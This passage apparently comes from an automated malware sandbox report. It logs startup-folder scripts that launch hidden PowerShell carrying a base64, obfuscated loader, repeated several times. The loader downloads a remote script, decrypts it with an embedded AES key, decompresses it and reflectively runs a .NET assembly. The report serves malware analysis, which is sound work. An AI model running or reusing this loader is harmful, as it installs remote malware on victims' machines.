wb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7